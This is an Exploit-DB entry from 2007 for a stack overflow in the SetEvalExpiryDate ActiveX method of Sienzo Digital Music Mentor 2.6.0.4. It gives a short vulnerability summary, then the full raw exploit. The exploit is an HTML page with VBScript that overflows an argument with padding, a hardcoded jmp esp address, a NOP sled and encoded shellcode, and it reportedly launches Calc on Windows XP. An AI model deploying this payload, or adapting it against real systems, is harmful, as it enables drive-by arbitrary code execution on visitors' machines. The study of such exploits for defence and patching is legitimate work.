Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow EIP Overwrite Exploit

vendor:

Digital Music Mentor (DMM)

by:

Parveen Vashishtha

7.5

CVSS

HIGH

Stack Overflow

CWE

Product Name: Digital Music Mentor (DMM)

Affected Version From: 2.6.0.4

Affected Version To: 2.6.0.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP

2007

Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow EIP Overwrite Exploit

This exploit targets the SetEvalExpiryDate method in the DSKernel2.dll file of Sienzo Digital Music Mentor (DMM) version 2.6.0.4. It allows an attacker to overwrite the EIP register, leading to arbitrary code execution.

Mitigation:

Update to a patched version of Sienzo Digital Music Mentor (DMM) to mitigate this vulnerability.

Source

Exploit-DB raw data:

<!--

  ===============================================================================================
      Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow EIP Overwrite Exploit
                                                By Parveen Vashishtha
  ==============================================================================================   
        
  Date : 07-05-2007
 
  
  Tested on Windows XP Latest -- Opens Calc
  
    
 
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Thanks to Metasploit and Stroke 

-->


<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9" > </OBJECT>

<script language="vbscript">


shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

jmp_esp=unescape("%81%69%A7%7C")


targetFile = "C:\Program Files\Sienzo\DMM\DSKernel2.dll"
prototype  = "Sub SetEvalExpiryDate ( ByVal Key As String ,  ByVal lCategory As Long ,  ByVal lModuleID As Long ,  ByVal lYear As Long ,  ByVal lMonth As Long ,  ByVal lDay As Long ,  ByVal vbReset As Boolean )"
memberName = "SetEvalExpiryDate"
progid     = "LMDSKernelLib2.LMDSKernel2"
argCount   = 7

arg1=String(836	, "A")
arg2=1
arg3=1
arg4=1
arg5=1
arg6=1
arg7=True

arg1=arg1+jmp_esp+nop+nop+shellcode+nop

target.SetEvalExpiryDate arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 

</script>
</body>
</html>

# milw0rm.com [2007-05-09]